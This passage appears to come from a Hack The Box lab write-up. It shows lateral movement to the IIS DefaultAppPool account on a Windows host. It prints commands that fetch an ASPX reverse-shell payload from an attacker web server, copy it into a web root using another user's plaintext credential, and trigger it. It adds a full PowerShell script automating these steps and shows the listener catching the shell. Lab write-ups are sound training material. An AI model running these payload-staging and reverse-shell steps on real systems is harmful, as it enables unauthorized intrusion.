IIS AppPool\DefaultAppPool
Because the full account name is long, the IIS AppPool\DefaultAppPool
account will be referred to as the iis-default
account from here on.
ASPX code execution has already been confirmed. In the following sections I move laterally to the iis-default
account by establishing a stable PowerShell reverse shell from the target system.
PS C:\tmp> iwr -Uri http://10.10.16.8/shell.aspx -Outfile C:\tmp\shell.aspx
Transferring the payload to the target system over HTTP from the attacker's web server
PS C:\tmp> $Cred = New-Object System.Management.Automation.PSCredential("FLIGHT.HTB\c.bum", (ConvertTo-SecureString "Tikkycoll_431012284" -AsPlainText -Force)) ; Start-Process cmd.exe -Credential $Cred -ArgumentList "/c copy C:\tmp\shell.aspx C:\inetpub\development\"
1 file(s) copied.
Using the same technique as before, the PowerShell Start-Process cmdlet with a PSCredential object for the c.bum
user, I copy the payload into the C:\inetpub\development
directory, the web root of the development site that is reached through the tunnel.
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ curl -s http://localhost:8000/shell.aspx
Invoking the payload from Kali through the tunnel to the development site on port 8000
PS C:\tmp> iwr -Uri http://127.0.0.1:8000/shell.aspx
Alternatively, it can be invoked locally on the target, since the development site listens on 127.0.0.1:8000
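The staging procedure above, written out as one PowerShell script. This is an added example and not code from the original write-up: it wraps the Start-Process -Credential trick in a helper that captures the child process's output, so the copy as c.bum can actually be verified from its own security context rather than assumed, and then triggers the ASPX over the local port. The attacker host, paths, the c.bum credential and port 8000 are the values from the write-up; the function names, the /Y overwrite flag and the use of C:\tmp for the redirect files are my own assumptions.

```powershell
# Added example, not the write-up's own code. Values come from the write-up;
# helper names (Get-Payload, Invoke-AsUser, Invoke-Payload) are illustrative.
$AttackerHost = '10.10.16.8'
$StageDir     = 'C:\tmp'
$Payload      = 'shell.aspx'
$WebRoot      = 'C:\inetpub\development'        # writable by c.bum, served on 127.0.0.1:8000
$TriggerUrl   = "http://127.0.0.1:8000/$Payload"

# Credential for the account that has write access to the web root
$Secure = ConvertTo-SecureString 'Tikkycoll_431012284' -AsPlainText -Force
$Cred   = New-Object System.Management.Automation.PSCredential('FLIGHT.HTB\c.bum', $Secure)

function Get-Payload {
    param([string]$Url, [string]$Destination)
    # Fetch the ASPX from the attacker's web server; -UseBasicParsing avoids the IE engine dependency
    Invoke-WebRequest -Uri $Url -OutFile $Destination -UseBasicParsing
    if (-not (Test-Path $Destination)) { throw "download failed: $Destination" }
    # Hash to compare against the local copy: a truncated transfer yields a page that will not compile
    (Get-FileHash -Path $Destination -Algorithm SHA256).Hash
}

function Invoke-AsUser {
    param([pscredential]$Credential, [string]$Command, [string]$WorkDir = $StageDir)
    # Start-Process -Credential creates a fresh logon through the Secondary Logon (seclogon)
    # service, so the child does not share our console and its output is lost unless redirected.
    # The working directory must be accessible to the target user or CreateProcessWithLogonW
    # fails with "The directory name is invalid"; C:\tmp is reachable by both accounts here.
    $out = Join-Path $WorkDir ("out_{0}.txt" -f [guid]::NewGuid())
    $err = Join-Path $WorkDir ("err_{0}.txt" -f [guid]::NewGuid())
    try {
        $p = Start-Process -FilePath 'cmd.exe' -ArgumentList "/c $Command" `
                 -Credential $Credential -WorkingDirectory $WorkDir -Wait -PassThru `
                 -RedirectStandardOutput $out -RedirectStandardError $err
        [pscustomobject]@{
            ExitCode = $p.ExitCode
            StdOut   = Get-Content $out -Raw -ErrorAction SilentlyContinue
            StdErr   = Get-Content $err -Raw -ErrorAction SilentlyContinue
        }
    } finally {
        Remove-Item $out, $err -Force -ErrorAction SilentlyContinue   # leave no redirect files behind
    }
}

function Invoke-Payload {
    param([string]$Url, [int]$TimeoutSec = 10)
    # Requesting the page makes IIS compile and run the ASPX under the app pool identity.
    # A live reverse shell keeps the request open, so a client timeout is the expected outcome;
    # a 500 means the page was reached but threw (compile error or broken payload).
    try {
        (Invoke-WebRequest -Uri $Url -UseBasicParsing -TimeoutSec $TimeoutSec).StatusCode
    } catch {
        if ($_.Exception.Response) { [int]$_.Exception.Response.StatusCode } else { $_.Exception.Message }
    }
}

# 1. Stage the payload locally
Get-Payload -Url "http://$AttackerHost/$Payload" -Destination (Join-Path $StageDir $Payload)

# 2. Copy it into the web root as c.bum and confirm with a dir run in the same context,
#    because our own account may not be allowed to list C:\inetpub\development
$copy = Invoke-AsUser -Credential $Cred -Command "copy /Y `"$StageDir\$Payload`" `"$WebRoot\`" && dir `"$WebRoot\$Payload`""
if ($copy.ExitCode -ne 0) { throw "copy as c.bum failed: $($copy.StdErr)" }
$copy.StdOut

# 3. Trigger it; the listener (nc -lvnp 8888) must already be running on the attacker box
Invoke-Payload -Url $TriggerUrl
```

The `&& dir` after the copy is what turns the one-liner into something checkable: cmd only runs it when the copy succeeded, and the listing comes back through the redirected stdout even though the child runs in another logon session. Step 3 returning a timeout message is normal once the shell has called back; a 500 or 404 means the page did not execute and the file or its contents should be checked before trying again.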
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.187] 54063
Windows PowerShell running as user G0$ on G0
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> hostname
g0
PS C:\windows\system32\inetsrv> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::23d
   IPv6 Address. . . . . . . . . . . : dead:beef::b1d9:efc7:61e1:4d02
   Link-local IPv6 Address . . . . . : fe80::b1d9:efc7:61e1:4d02%6
   IPv4 Address. . . . . . . . . . . : 10.10.11.187
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
                                       10.10.10.2
Lateral movement to the iis-default
account is complete. The banner's G0$ and whoami's iis apppool\defaultapppool are the same identity: IIS runs the worker process under the DefaultAppPool virtual account, and that account presents itself to the domain as the computer account G0$.